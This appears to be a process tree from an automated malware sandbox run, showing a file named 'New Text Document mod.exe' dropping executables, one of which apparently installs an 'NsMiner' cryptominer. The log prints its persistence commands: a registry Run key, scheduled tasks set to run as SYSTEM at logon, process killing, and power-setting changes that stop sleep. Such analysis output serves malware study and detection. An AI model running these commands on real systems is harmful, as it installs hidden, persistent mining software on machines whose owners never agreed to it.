    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2224,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1688 /prefetch:8
    3⤵
    PID:2348
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3128 /prefetch:1
    3⤵
    PID:2076
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3280,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1
    3⤵
    PID:3748
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4452,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4488 /prefetch:1
    3⤵
    PID:1020
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4644,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4784 /prefetch:8
    3⤵
    PID:2872
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4860,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8
    3⤵
    PID:4676
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5084,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5076 /prefetch:8
    3⤵
    PID:4600
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5020,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5088 /prefetch:8
    3⤵
    PID:4532
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5004,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5100 /prefetch:8
    3⤵
    PID:4676
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8
    3⤵
    PID:2552
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5160,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5184 /prefetch:2
    3⤵
    PID:5644
- - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
    3⤵
    - Drops file in Windows directory
    PID:6088
  - - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
      "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x244,0x248,0x24c,0x210,0x250,0x7ff6da6a4698,0x7ff6da6a46a4,0x7ff6da6a46b0
      4⤵
      Drops file in Windows directory
      PID:6108
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4792,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4284 /prefetch:1
    3⤵
    PID:5288
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3252,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3416 /prefetch:1
    3⤵
    PID:5856
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3260,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5456 /prefetch:1
    3⤵
    PID:5932
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4376,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4332 /prefetch:1
    3⤵
    PID:4508
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=3312,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5460 /prefetch:8
    3⤵
    PID:3672
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4692,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5576 /prefetch:8
    3⤵
    PID:2252
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5636,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5044 /prefetch:8
    3⤵
    - Modifies registry class
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:3408
  - - C:\Users\Admin\Desktop\New Text Document mod.exe
      "C:\Users\Admin\Desktop\New Text Document mod.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:6828
    - - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
        
        "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
        5⤵
        Executes dropped EXE
        
        PID:6988
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6976
      - C:\Users\Admin\Desktop\a\00.exe
        
        "C:\Users\Admin\Desktop\a\00.exe"
        6⤵
        
        PID:4080
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 352
        7⤵
        Program crash
        
        PID:8076
      - C:\Users\Admin\Desktop\a\02.exe
        
        "C:\Users\Admin\Desktop\a\02.exe"
        6⤵
        
        PID:1992
        
        C:\Users\Admin\Desktop\a\._cache_02.exe
        
        "C:\Users\Admin\Desktop\a\._cache_02.exe"
        7⤵
        
        PID:5368
      - C:\Users\Admin\Desktop\a\IMG001.exe
        
        "C:\Users\Admin\Desktop\a\IMG001.exe"
        6⤵
        
        PID:3088
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
        7⤵
        
        PID:3440
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        8⤵
        Kills process with taskkill
        
        PID:3488
        
        C:\Users\Admin\AppData\Local\Temp\tftp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
        7⤵
        
        PID:7568
        
        C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
        
        "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        7⤵
        
        PID:7616
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
        8⤵
        
        PID:3052
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        9⤵
        Kills process with taskkill
        
        PID:8528
        
        C:\Users\Admin\AppData\Local\Temp\tftp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
        8⤵
        
        PID:9068
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        8⤵
        
        PID:8968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        9⤵
        
        PID:3992
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        8⤵
        
        PID:9184
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8824
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        8⤵
        
        PID:9192
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3428
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        8⤵
        Power Settings
        
        PID:5704
        
        C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -standby-timeout-ac 0
        9⤵
        Power Settings
        
        PID:212
        
        C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -hibernate-timeout-ac 0
        9⤵
        Power Settings
        
        PID:4680
        
        C:\Windows\SysWOW64\powercfg.exe
        
        Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        9⤵
        Power Settings
        
        PID:3408
      - C:\Users\Admin\Desktop\a\Kerish_Doctor.exe
        
        "C:\Users\Admin\Desktop\a\Kerish_Doctor.exe"
        6⤵
        
        PID:9136
        
        C:\Users\Admin\AppData\Local\Temp\is-CORPK.tmp\Kerish_Doctor.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-CORPK.tmp\Kerish_Doctor.tmp" /SL5="$90388,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor.exe"
        7⤵
        
        PID:4828
  - - C:\Users\Admin\Desktop\New Text Document mod.exe
      "C:\Users\Admin\Desktop\New Text Document mod.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:5420
    - - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
        
        "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
        5⤵
        Executes dropped EXE
        
        PID:1600
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5656
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5612,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5628 /prefetch:8
    3⤵
    PID:5796
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:1140
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    - Executes dropped EXE
    PID:1484
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:940
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:6408
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    - Executes dropped EXE
    PID:3012
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1232
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:5076
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    - Executes dropped EXE
    PID:4840
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6192
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:1920
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    - Executes dropped EXE
    PID:6632
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3132
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:6712
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    - Executes dropped EXE
    PID:6480
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6436
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:6188
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    - Executes dropped EXE
    PID:5256
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:2136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  PID:6596
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa2103cc40,0x7ffa2103cc4c,0x7ffa2103cc58
    3⤵
    PID:1920
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1744,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=1736 /prefetch:2
    3⤵
    PID:6540
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2028,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=2136 /prefetch:3
    3⤵
    PID:1996
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1564,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=2160 /prefetch:8
    3⤵
    PID:6696
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3124 /prefetch:1
    3⤵
    PID:5404
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3300,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3172 /prefetch:1
    3⤵
    PID:3228
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4380,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4452 /prefetch:1
    3⤵
    PID:1304
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3508,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3980 /prefetch:1
    3⤵
    PID:6404
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4684,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4740 /prefetch:8
    3⤵
    PID:3524
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4036,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4756 /prefetch:8
    3⤵
    PID:5380
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3136,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3392 /prefetch:8
    3⤵
    PID:5720
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5148,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5156 /prefetch:8
    3⤵
    PID:6100
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5184,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5160 /prefetch:8
    3⤵
    PID:532
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5156,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3108 /prefetch:8
    3⤵
    PID:6860
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4956,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5144 /prefetch:8
    3⤵
    PID:1144
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  PID:9204
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0x7c,0x108,0x7ffa2103cc40,0x7ffa2103cc4c,0x7ffa2103cc58
    3⤵
    PID:5244
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1712,i,6726559503383079044,3111245654459475183,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=1696 /prefetch:2
    3⤵
    PID:8196
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2120,i,6726559503383079044,3111245654459475183,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=2124 /prefetch:3
    3⤵
    PID:8228
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2200,i,6726559503383079044,3111245654459475183,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=2212 /prefetch:8
    3⤵
    PID:8244
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,6726559503383079044,3111245654459475183,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3108 /prefetch:1
    3⤵
    PID:6644
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,6726559503383079044,3111245654459475183,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3288 /prefetch:1
    3⤵
    PID:4524
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,6726559503383079044,3111245654459475183,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4536 /prefetch:1
    3⤵
    PID:8680
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3508,i,6726559503383079044,3111245654459475183,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4332 /prefetch:1
    3⤵
    PID:8860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3548

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3880

C:\Windows\System32\RuntimeBroker.exe
